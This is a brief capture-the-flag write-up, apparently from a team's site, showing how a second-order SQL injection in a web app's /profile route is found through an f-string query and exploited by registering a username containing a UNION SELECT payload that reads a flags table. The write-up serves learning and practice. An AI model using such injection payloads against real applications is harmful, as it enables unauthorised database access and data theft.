Second Breakfast

Challenge Overview

This challenge consists of analyzing init.sql and app.py from the source code we're given.

init.sql:

CREATE TABLE flags (
    flag TEXT
);

We have some endpoints in app.py like /login and /register which seems to be well-secured using %s. But in /profile route we can clearly spot SQL Injection:

query = f"SELECT username, created_at FROM users WHERE username='{username}'"

Since we got this in /profile endpoint, we can assume that this is not a classic SQLI injected in /login or /register path, but in our account username.

Exploitation

Note: This is not a blind SQLi since we have the source code and can see that the query returns 2 columns (username and created_at). Otherwise, we could use ORDER BY 1, ORDER BY 2, etc., to guess the number of columns.

The solution is to use an UNION based attack, which combines two or more SELECT queries. Because the original query has USERNAME (txt) and created_at (timestamp) we should create another one based on that.

After a Google Search I found CURRENT_TIMESTAMP() MYSQL Function. We could also use whatever timestamp we want in MySQL Format.

Final Payload

' UNION SELECT flag, CURRENT_TIMESTAMP() FROM flags -- -

made by k0d

PreviousFlag Aperisal Nextclock_out

Last updated 25 days ago

hashtagChallenge Overview

hashtagExploitation

hashtagFinal Payload

Challenge Overview

Exploitation

Final Payload